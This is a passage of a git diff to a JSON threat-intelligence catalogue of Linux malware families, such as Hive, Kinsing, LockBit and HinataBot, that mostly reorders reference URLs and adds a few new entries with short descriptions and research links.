+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
@@ -4393,14 +4793,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime",
- "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
- "https://par.nsf.gov/servlets/purl/10096257",
- "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
- "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
"https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
"https://github.com/Psychotropos/hajime_hashes",
+ "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
+ "https://x86.re/blog/hajime-a-follow-up/",
"http://blog.netlab.360.com/hajime-status-report-en/",
- "https://x86.re/blog/hajime-a-follow-up/"
+ "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
+ "https://par.nsf.gov/servlets/purl/10096257",
+ "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
],
"synonyms": [],
"type": []
@@ -4450,20 +4850,36 @@
"uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d",
"value": "Hand of Thief"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellobot",
+ "https://blog.exatrack.com/melofee/",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b9fec670-2b1e-4287-ac93-68360d5adcf4",
+ "value": "HelloBot (ELF)"
+ },
{
"description": "Linux version of the HelloKitty ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty",
- "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group",
"https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/",
"https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
- "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/"
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
@@ -4471,6 +4887,19 @@
"uuid": "785cadf7-5c99-40bc-b718-8a98d9aa90b7",
"value": "HelloKitty (ELF)"
},
+ {
+ "description": "Lumen discovered this malware used in campaign targeting business-grade routers using a RAT they call HiatusRAT and a variant of tcpdump for traffic interception.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat",
+ "https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "69dcee87-dc61-48d4-a6af-177396bdb850",
+ "value": "HiatusRAT"
+ },
{
"description": "",
"meta": {
@@ -4491,14 +4920,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
- "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
- "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
+ "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
"https://blog.avast.com/hide-n-seek-botnet-continues",
"https://threatlabs.avast.com/botnet",
+ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
"https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
- "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
- "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html",
"https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
+ "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html",
+ "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
"https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/"
],
"synonyms": [
@@ -4509,6 +4938,19 @@
"uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
"value": "Hide and Seek"
},
+ {
+ "description": "HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot",
+ "https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b10fc382-b740-417a-98fa-e23d10223958",
+ "value": "HinataBot"
+ },
{
"description": "",
"meta": {
@@ -4527,25 +4969,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
"https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
- "https://arxiv.org/pdf/2202.08477.pdf",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://github.com/rivitna/Malware/tree/main/Hive",
- "https://twitter.com/ESETresearch/status/1454100591261667329",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://blog.group-ib.com/hive",
- "https://twitter.com/malwrhunterteam/status/1455628865229950979",
- "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
"https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://github.com/reecdeep/HiveV5_file_decryptor",
"https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://arxiv.org/pdf/2202.08477.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://twitter.com/malwrhunterteam/status/1455628865229950979",
"https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again"
+ "https://twitter.com/ESETresearch/status/1454100591261667329",
+ "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
+ "https://blog.group-ib.com/hive",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://github.com/rivitna/Malware/tree/main/Hive"
],
"synonyms": [],
"type": []
@@ -4566,6 +5010,21 @@
"uuid": "c55389b0-e778-4cf9-9030-3d1efc1224c9",
"value": "Hubnr"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hyperssl",
+ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html"
+ ],
+ "synonyms": [
+ "SysUpdate"
+ ],
+ "type": []
+ },
+ "uuid": "263aaef5-9758-49f1-aff1-9a509f545bb3",
+ "value": "HyperSSL (ELF)"
+ },
{
"description": "",
"meta": {
@@ -4585,8 +5044,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper",
"https://research.checkpoint.com/new-iot-botnet-storm-coming/",
- "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
- "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm"
+ "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
+ "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/"
],
"synonyms": [
"IoTroop",
@@ -4603,11 +5062,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
"https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf",
- "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/"
+ "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/",
+ "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"InterPlanetary Storm"
@@ -4636,10 +5095,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji",
"https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/",
"https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/",
+ "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
],
"synonyms": [],
"type": []
@@ -4648,15 +5108,16 @@
"value": "Kaiji"
},
{
- "description": "",
+ "description": "According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer that allows it to perform other malicious activities. The trojan does not create any copies of itself. This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day",
"https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/",
"https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day",
- "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html",
- "https://www.lacework.com/the-kek-security-network/"
+ "https://www.lacework.com/the-kek-security-network/",
+ "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
],
"synonyms": [
"STD"
@@ -4671,11 +5132,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods",
- "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html",
- "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916",
"https://blog.talosintelligence.com/2019/09/watchbog-patching.html",
+ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
"https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/",
- "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916"
+ "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html"
],
"synonyms": [],
"type": []
@@ -4688,11 +5149,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.mandiant.com/resources/apt41-us-state-governments",
"https://twitter.com/CyberJack42/status/1501290277864046595",
- "https://experience.mandiant.com/trending-evil/p/1",
"https://www.mandiant.com/resources/mobileiron-log4shell-exploitation",
- "https://www.mandiant.com/resources/apt41-us-state-governments"
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf"
],
"synonyms": [
"ELFSHELF"
@@ -4720,25 +5181,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
+ "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
"https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability",
"https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
- "https://twitter.com/IntezerLabs/status/1259818964848386048",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
- "https://unit42.paloaltonetworks.com/cve-2020-25213/",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
- "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
- "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
- "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
"https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/",
- "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
+ "https://twitter.com/IntezerLabs/status/1259818964848386048",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://unit42.paloaltonetworks.com/cve-2020-25213/",
+ "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
+ "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
"https://redcanary.com/blog/kinsing-malware-citrix-saltstack/",
- "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
- "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html"
+ "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"h2miner"
@@ -4766,10 +5227,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos",
- "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf",
"https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/",
"https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/"
+ "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf"
],
"synonyms": [],
"type": []
@@ -4822,8 +5283,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock",
"https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/",
- "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html",
- "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/"
+ "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/",
+ "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html"
],
"synonyms": [
"Lilocked",
@@ -4852,21 +5313,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot",
- "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/",
- "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/"
+ "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/",
+ "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e537e165-ea8b-4e75-8813-6519632d3f6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3fe8f3db-4861-4e78-8b60-a794fe22ae3f",
"value": "LiquorBot"
},
@@ -4875,15 +5327,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit",
- "https://www.ic3.gov/Media/News/2022/220204.pdf",
- "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
- "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
"https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/"
+ "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/",
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
+ "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://security.packt.com/understanding-lockbit/",
+ "https://analyst1.com/ransomware-diaries-volume-1/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.ic3.gov/Media/News/2022/220204.pdf",
+ "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants"
],
"synonyms": [],
"type": []
@@ -4896,9 +5354,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas",
- "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html",
"https://www.cadosecurity.com/2020/05/16/1318/",
- "https://twitter.com/nunohaien/status/1261281419483140096"
+ "https://twitter.com/nunohaien/status/1261281419483140096",
+ "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html"
],
"synonyms": [],
"type": []
@@ -4932,13 +5390,27 @@
"uuid": "cfcf8608-03e7-4a5b-a46c-af342db2d540",
"value": "Lootwodniw"
},
+ {
+ "description": "ESXi encrypting ransomware written in Rust.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.luna",
+ "https://nikhilh-20.github.io/blog/luna_ransomware/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bc9022d6-ee65-463f-9823-bc0f96963a75",
+ "value": "Luna"
+ },
{
"description": "Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.manjusaka",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://github.com/avast/ioc/tree/master/Manjusaka"
+ "https://github.com/avast/ioc/tree/master/Manjusaka",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html"
],
"synonyms": [],
"type": []
@@ -4951,24 +5423,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta",
- "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7",
"https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/",
- "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes"
+ "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes",
+ "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
],
"synonyms": [
"PureMasuta"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d4dec2c-915a-4fef-ba7a-633421bd0848",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd",
"value": "Masuta"
},
@@ -4985,18 +5448,33 @@
"uuid": "4e989704-c49f-468c-95e1-1b7c5a58b3c4",
"value": "Matryosh"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.melofee",
+ "https://blog.exatrack.com/melofee/"
+ ],
+ "synonyms": [
+ "Mélofée"
+ ],
+ "type": []
+ },
+ "uuid": "1ffd85bd-389c-4e04-88fd-8186423c3691",
+ "value": "Melofee"
+ },
{
"description": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://attack.mitre.org/groups/G0096",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/"
],
"synonyms": [],
"type": []
@@ -5009,8 +5487,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim",
- "https://www.guitmz.com/linux-midrashim-elf-virus/",
- "https://github.com/guitmz/midrashim"
+ "https://github.com/guitmz/midrashim",
+ "https://www.guitmz.com/linux-midrashim-elf-virus/"
],
"synonyms": [],
"type": []
@@ -5023,8 +5501,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md",
- "https://securitykitten.github.io/2016/12/14/mikey.html"
+ "https://securitykitten.github.io/2016/12/14/mikey.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md"
],
"synonyms": [],
"type": []
@@ -5037,64 +5515,66 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
- "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html",
- "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/",
- "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
- "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/",
- "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
